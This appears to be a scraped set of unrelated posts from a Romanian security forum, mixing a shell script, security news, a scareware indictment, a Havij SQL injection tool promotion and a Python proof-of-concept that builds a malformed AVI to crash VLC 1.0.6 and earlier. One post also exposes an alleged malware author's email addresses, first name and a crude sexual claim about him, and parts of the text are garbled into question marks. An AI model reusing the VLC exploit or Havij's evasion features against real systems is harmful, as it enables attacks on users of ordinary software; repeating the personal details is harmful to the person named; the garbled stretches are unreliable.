begood

sunt deja

UPDATE Are 144 MiB ( 150,499,328 bytes ) Defini?ia viru?ilor updatat? pân? la 30.05.2010 (azi) Kaspersky Anti-Virus Linux LiveCD - Wuala http://dl.dropbox.com/u/6179878/Kaspersky%20Anti-Virus%20linux%20LiveCD/rescuecd%20-%20Kaspersky%20Anti-Virus%202010%2030.05.2010-begood.iso crc32 : 3513C878

This video will show you how to analyze a malware with free tools that are available on the internet. The tools that are used are sysinternals, regshot and wireshark. This video was created by netinfinity (net.infinitum [] gmail [] com). Simple Malware Analyzing Tutorial

#!/bin/bash # A Shell Script To Convert All .flac Files To .MP3 Format # Note: I found this script somewhere on usenet and I 've modified it for my needs METAFLAC=/usr/bin/metaflac FLAC=/usr/bin/flac ID3=/usr/bin/id3 LAME=/usr/bin/lame FIND=/usr/bin/find t=$(${FIND} . -type f -iname "*.flac") if [ "$t" == "" ] then echo "There are no *.flac file in $(pwd) directory" exit 1 fi for f in *.flac do OUTF=$(echo "$f" | sed s/\.flac$/.mp3/g) ARTIST=$(${METAFLAC} "$f" --show-tag=ARTIST | sed s/.*=//g) TITLE=$(${METAFLAC} "$f" --show-tag=TITLE | sed s/.*=//g) ALBUM=$(${METAFLAC} "$f" --show-tag=ALBUM | sed s/.*=//g) GENRE=$(${METAFLAC} "$f" --show-tag=GENRE | sed s/.*=//g) TRACKNUMBER=$(${METAFLAC} "$f" --show-tag=TRACKNUMBER | sed s/.*=//g) DATE=$(${METAFLAC} "$f" --show-tag=DATE | sed s/.*=//g) $FLAC -c -d "$f" | $LAME -m j -q 0 --vbr-new -V 0 -s 44.1 - "$OUTF" $ID3 -t "$TITLE" -T "${TRACKNUMBER:-0}" -a "$ARTIST" -A "$ALBUM" -y "$DATE" -g "${GENRE:-12}" "$OUTF" done Shell Script To Convert All .flac Files To .MP3 Format

ban range.

We are really liking this tool. For with this tool, you can almost go back to your “point and shoot” days! Havij is a free tool, programmed in Visual Basic that will automate SLQ injections for you! Infact, just to test it out, we tried this on an installation of DVWA and it got us what we wanted! Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. All you need to know is a bit of SQL injection and you are done. You just need to click a button and wait till it finds a exploitable SQL query. Not only that, you can also fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. Ofcourse most of that is after you have a successful exploit. Not only that, it supports a wide array of databases – MsSQL, MySQL, MSAccess and Oracle! You could also choose to evade IDS detection by simple pre-configured tricks of this tool. You can also try to brute force your way to find the admin directory and yes it does support proxies too! This is how Havij looks: Click this bar to view the full image. These are the current functions that Havij supports as of now: Supported Databases with injection methods: a. MsSQL 2000/2005 with error b. MsSQL 2000/2005 no error (union based) c. MySQL (union based) d. MySQL Blind e. MySQL error based f. Oracle (union based) g. MsAccess (union based) Automatic database detection Automatic type detection (string or integer) Automatic keyword detection (finding difference between the positive and negative response) Trying different injection syntaxes Proxy support Real time result Options for replacing space by /**/,+,… against IDS or filters Avoid using strings (magic_quotes similar filters bypass) Bypassing illegal union Full customizable http headers (like referer and user agent) Load cookie from site for authentication Guessing tables and columns in mysql<5 (also in blind) and MsAccess Fast getting tables and columns for mysql Multi thread Admin page finder Multi thread Online MD5 cracker Getting DBMS Informations Getting tables, columns and data Command executation (mssql only) Reading system files (mysql only) Insert/update/delete data As we have already said previously that this is a tool in Visual Basic, this will run only on Windows. Installation is pretty much simple too. We noticed something peculiar about this tool. It installs – columns.txt, admins.txt and tables.txt. Call them teh databases of Havij. You are free to add your stuff to these files. Just take care where you add those things. Download Havij version 1.10 here. Havij: A Advanced SQL Injection Tool! ? PenTestIT

in cel mai rau caz instalezi windowsul de pe stick.

@pyth0n3 exagerezi, asa poti uita chiar tu parola, iar din toata obsesia protejarii parolelor si a informatiilor personale te alegi cu toate conturile pierdute. uite un om mai obsedat ca mine in privinta securitatii

In November 2008, Stéphane Manuel published a new disturbance vector for SHA-1 with complexity 2^57. He provided no differential path through the first 20 steps. Using Joux and Peyrin’s boomerang attack with n auxiliary differentials, the complexity can be reduced to 2(57?n). Our goal is to find a non-linear main differential path through the first 20 steps where a maximum number of auxiliary differentials can be applied. Achieved: A differential path with 5 independent auxiliary paths - complexity 2^52. http://eurocrypt2009rump.cr.yp.to/837a0a8086fa6ca714249409ddfae43d.pdf

hai ca vine si filelist si rowarez. ban permanent pe ip.

apropo, daca vreti sa-l analizati si sa-i gasiti mailul/ftp-ul + parola folosita uitati un mirror : Multiupload.com - upload your files to multiple file hosting sites! password rstcenter.com email : oxxy_t@yahoo.com tttomam@gmail.com il cheama Marian si vrea sa se futa cu Oana E din Iasi. http://oxxymgfx.deviantart.com/ http://hi5.com/friend/p485327700--%E2%99%ABBaiatu%27%20din%20ultima%20banca_%E2%99%AB--html

altu care-si face spread prin youtube... pa si pusi. http://anubis.iseclab.org/?action=result&task_id=193b5ba80eb9e4e3449f3598d781d34cd&format=html da, are si keylogger. http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-dybalom-gd-trojan-and-key-logger-not-detected-yet/ asta era binduit.

Simon was the first of a few of you to send over a blog post by author Joe Konrath discussing why he doesn't worry much about his books being available online via unauthorized file sharing avenues. The whole blog post is so reasonable and well argued that you really should just go read the whole thing, so here are a few snippets to get you interested: People want to share files. There is this much file sharing going on for a reason. It's what people want. Fighting piracy is fighting human nature. This is a battle no one can win. Getting your undies in a bunch at the thought of someone copying your ebook is a waste of a good ulcer. Worry about some problem that eventually will be solved. Like world hunger. Or cancer. Or war. Those will be conquered before file sharing is.... There is ZERO reliable evidence that file-sharing hurts sales. A shared file does not equal a lost sale, any more than someone reading a library book is a lost sale. The best part is a bit later in the post, where he tries to pre-empt the usual "but it's theft!!!!" arguments with a series of Q&As that read something like many of the comment exchanges we end up having here at Techdirt, by pointing out that it's not the same as stealing a tangible object, and even so it doesn't matter. He also takes on another popular argument made in our comments: but what if artists don't want to embrace new business models: Q: But Joe, if everyone steals your ebooks, how will you make money? A: Show me an artist bankrupted by piracy, and we'll revisit this question. Q: No, seriously, in a future where everything is free, how will... A: We're not in a future where everything is free. But I'll play the "let's pretend" game. Let's pretend that all ebooks are free. How will writers make money? The same way all media makes money. Advertising, merchandising, and licensing. Q: But I don't want ads in ebooks. A: I don't want ads in anything. But that's how capitalism works. Deal with it. Again, the whole thing is a worthwhile read, but highlights a key point that we keep trying to make over and over again. So many keep focusing in on the whole "piracy!" aspect, and that's such a huge waste of time. Why focus on trying to stop something you don't like, when you can put your energy into creating a positive situation that you do like? Why focus on trying to punish people you don't like, when you have so many opportunities to happily engage with people you do like? Joe Konrath Explains Why Authors Shouldn't Fear File Sharing | Techdirt

Vreau site-uri de stiri doar securitate, cat mai multe si cat mai bune. Cu cel putin un feed (RSS/atom/etc). Lasati linkuri. Si incercati sa nu postati de doua ori acelasi site. thx.bye.

This is the video of the presentation titled "GPU vs CPU Supercomputing Security Shootout" given by Collin Brack at Shmoocon 2010. Abstract: You have the fastest Intel/AMD processor in a 500 mile radius thanks to your custom built quad-core, liquid nitrogen cooled, overclocked 5.0Ghz CPU monster. Prepare to be summarily beat down, computationally speaking, by the kid next door who just bought the latest Nvidia GPU to play WOW at 80fps. Video cards, fueled by the gaming industry, have leap-frogged (pun intended) the processing power of the general purpose CPU for certain computational tasks. The rise of the multi-processor based general purpose GPU (GPGPU) platform is taking academia by storm due to its low costs and low barrier to entry into modern day supercomputing. The security community has already embraced the GPU for heavy lifting as have other fields especially when coupled with the sleek marketing efforts by Nvidia and their CUDA development environment, and competing GPU computing platforms from ATI and OpenCL. This 20 minutes session will chronicle the rise of the GPU in high performance computing and will highlight GPU vs. CPU benchmarks of well known security tools including: aircrack (10x speed-up), Pyrit (8x), CUDA Multiforcer, BarsWF MD5 cracker (3x), RainbowCrack multi-GPU CUDA version, and more. Finally, links and tips regarding implementing CUDA in Back|Track 4 are shared. Author Bio: Collin Brack is a healthcare informatics and medical imaging consultant with experience in computational clusters. He works in academia where he focuses on high performance computing with medical physics researchers. His latest cluster is based on high-end graphics processors to achieve performance gains previously only available to multi-million dollar big iron. He has published and presented on the topics of system design, grid computing, and disaster recovery. You can download the high resolution video here. Below is the embed of the presentation. GPU vs CPU Supercomputing Security Shootout (Shmoocon 2010) Tutorial

< It's got what admins crave. > This web site provides a reliable and cost-effective way to get properly generated ssh keys. To get your free ssh key pair, fill out this form, print for your records, and submit. These keys are robustly randomly-seeded and are escrowed. It is your responsibility to secure your new key pair in transit. Keys generated here enable you to use robust encryption to manage servers, transfer files, and mount remote directories. Note that the pass phrase is a recommended best practice, but is optional for your convenience. ssh-keygen, the web-based SSH Key Generator

The personal details of 4.3 million job seekers may have been compromised in a “concerted and sophisticated” hack attack on Trinity Mirror's recruitment sites. According to Trinity Mirror, no actual CV details were exposed during the attack on sites such as Planet Recruit and JobSearch, even though the company believes email address and passwords may have been compromised. “Our security systems have detected a concerted and sophisticated attempt to hack into user accounts on our technology platform,” the company told job hunters by email. “After completing our initial investigations we can confirm that no CV records or job application information were accessed. We do not know whether email addresses and passwords were taken, but we believe that unfortunately you should work on the basis that they were." The company said all passwords were reset within four hours of the hack being discovered, and that staff emailed all CV posters to warn them of the problem. "We were onto it pretty sharpish and closed things down while we sorted it out," a Trinity Mirror spokesperson told PC Pro. "And we let everyone know what was going on, so we feel we did all the right things after the attack." Trinity Mirror Digital Recruitment, which focuses on sector-specific recruitment boasts more than 4.3 million registered candidates and claims 443,000 applications a month. Its sites include SecsintheCity, totallylegal, PlanetRecruit, TheCareerEngineer and GAAPweb. Read more: Hack attack targets 4.3 million online CVs | Security | News | PC Pro http://www.pcpro.co.uk/news/security/358282/hack-attack-targets-4-3-million-online-cvs

Documentary takes a look at the Chinese Hacking scene. Talks about how expensive Internet access was in the early days and how Chinese hackers would hack into ISPs and use other people's Internet accounts. Then the narrator moves on to how top Chinese hackers wrote tools and distribute it to others who were less experienced but good enough to run the tools to deface websites and hack into systems. Many Chinese hackers are shown as small case studies where their exploits etc are discussed. e.g. is the author of the IloveYou virus. Then the narrator discusses about the early days when hacking was not a crime in many countries and how slowly after the hacking incidents got worse and more frequent, laws were brought into place. My personal opinion is the documentary is just OK and is almost like a primer on hacking and security with discussions such as what are Trojans, computer viruses etc. Anyways, good for a one time watch. Cyber Wars Documentary Tutorial

chiar nu inteleg ce-i cu cenzura

Postarea de programe hexate hai ban 1 luna.

nu va place japoneza ? Japan plans $2 billion robot moon base by 2020 | Crave - CNET

? ????????? ????? ????. ???????????2015????????????????????????????2020?????????????????????? ??????????????????????????????2000????? ????????????????????????????????????????????????????????????????????? ???????????????? ???????????????????????????????????? ????????????????????????????????????? ???????????????????????? 2020?????????????????????????????? NODE ?????????? ???? //UPS???? ???????????????????????????

#!/usr/bin/python ###################################################################################################### # # VLC Media Player <=1.0.6 Malformed Media File Crash PoC # Found By: Dr_IDE # Tested: Windows 7, Ubuntu 9, OSX 10.6.X # Download: http://www.videolan.org # Notes: Register overwrites seem very unpredictable at best... # Greets: Offsec and Corelan Teams # ###################################################################################################### ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00") cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00" "\x00\x00\x00\x00\x00") eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00") filename = "VLC_Doesnt_Like_Videos_That_Are_Really_Zip_Files.AVI" exploit = filename exploit += "\x41" * 5000 print "[+] Writing file" file = open('boom.avi','w'); #Anything here works, mpg, mp4, asf, mov etc... file.write(ldf_header + exploit + cdf_header + exploit + eofcdf_header); file.close() print "[+] Exploit file created!!" :D:D AVI #Anything here works, mpg, mp4, asf, mov etc...

fisierul istealer 6.3.exe contine un trojan downloader. Virustotal. MD5: 5a2b010a9028767584a338bfa357bc6c Trojan.Dropper Heuristic.LooksLike.Win32.Suspicious.J TR/Meredrop.A.9513

Federal authorities say they have cracked open a cybercrime gang that allegedly duped tens of thousands of consumers into paying more than $100 million for worthless antivirus protection, priced from $30 to $70. A Chicago grand jury returned this indictment against Bjorn Daniel Sundin, 31, a U.S. citizen believed to be living in the Ukraine; Shaileshkumar P. Jain, 40, a Swedish citizen believed to be living in Sweden; and James Reno, 26, of Amelia, Ohio. The three are alleged to have help operate an online company, called Innovative Marketing, registered in Belize, that sold worthless programs with names like “Antivirus 2008? and “DriveCleaner” and “ErrorSafe.” Worthless scan in support of worthless protection “The indictment provides a detailed account into the practices used by these online fraudsters,” says Chet Wisniewski, analyst at antivirus firm Sophos. “It sends an important message that US authorities in cooperation with foreign governments will not allow scams to go unpunished.” Sundin, Jain and others allegedly created at least seven fictitious advertising agencies that placed ads worth $85,000 with legit website publishers; the ads were never paid for. Consumers who clicked on the ads were redirected to websites controlled by Innovative Marketing that ran fake scans and steered victims into buying worthless cleanups and innoculations. According to the indictment, Sudin, Jain and others set up a complex, efficient payment misdirection scheme that kept them one step ahead. They established multiple merchant accounts set up to complete credit card transactions from their victims. Over time, the merchant accounts became unusable due to repeated requests for refunds or as chargebacks from Visa and MasterCard stacked up. When that happened, they simply moved to a fresh group of merchant accounts. The payment sites had names like “billingbit.com,” “bucksbill.com,” “software-payment.com,” and “bestpaymentsolution.net.” Here’s a description of how the ill-gained profits flowed through the Caribbean onto Eastern Europe and Scandanavia: It was further part of the scheme that defendants BJORN DANIEL SUNDIN, SHAILESHKUMAR P. JAIN, JAMES RENO, and others caused credit card processors in the United States and elsewhere, including Credit Card Processor A located in Ft. Lauderdale, Florida, to process payments received from victim internet users made on the multiple payment websites. Credit Card Processor A deposited funds received from victim internet users’ credit card payments into bank accounts controlled by defendants SUNDIN, JAIN, and others throughout the world, including a bank account held in name of “Versata Software” at the First Caribbean Bank in the British Virgin Islands. It was further part of the scheme that defendants BJORN DANIEL SUNDIN, SHAILESHKUMAR P. JAIN, and others caused funds deposited by credit card processors to be transferred from the original receiving accounts to additional bank accounts controlled by defendants SUNDIN, JAIN, and others held throughout the world, including multiple accounts held at Skandinaviska Enskilda Banken located in Sweden, Aizkraukles Banka located in Latvia, and Swedbank located in Ukraine. It was further part of the scheme that defendants BJORN DANIEL SUNDIN, SHAILESHKUMAR P. JAIN, and others caused to be transferred, from bank accounts under defendants’ control in Sweden to accounts under defendants’ control in Latvia, approximately $7,400,000 and €7,800,000 through approximately 42 separate electronic transmissions, including the following: An electronic transfer on or about March 22, 2007, of approximately $400,000 from an account in Sweden to an IM bank account in Latvia; and …An electronic transfer on or about April 2, 2007, of approximately $400,000 from an account in Sweden to an IM bank account in Latvia. Reno, who is expected to turn himself into authorities in Chicago, allegedly ran Byte Hosting Internet, a call center that took calls from consumers inquiring about billing and technical help. Along with spam pitching fake drugs, online promotions for worthless antivirus software, or scareware, are two of the cyberunderground’s most lucrative cottage industries. “This is just one of many scareware scams, and we absolutely believe that this business will continue to grow,” says Kevin Stevens, a researcher at SecureWorks. Sundin and Jain were each charged with 24 counts of wire fraud, and Reno with 12 counts of wire fraud; all three were charged with one count each of conspiracy to commit computer fraud and computer fraud. The indictment also seeks forfeiture of approximately $100 million held in a bank account in Kiev. The charges were announced by Patrick J. Fitzgerald, United States Attorney for the Northern District of Illinois, and Robert D. Grant, Special Agent-in-Charge of the Chicago Office of the Federal Bureau of Investigation, which conducted the global investigation. The Justice Department’s Office of International Affairs and the Computer Crimes and Intellectual Property Section assisted in the investigation. “These defendants allegedly preyed on innocent computer users, exploiting their fraudulently induced fears for personal gain. We will continue our efforts to identify and aggressively investigate similar schemes with the assistance of our law enforcement partners both at home and internationally,” Mr. Grant said. By Byron Acohido USDOJ cracks open $100 million scareware operation | The Last Watchdog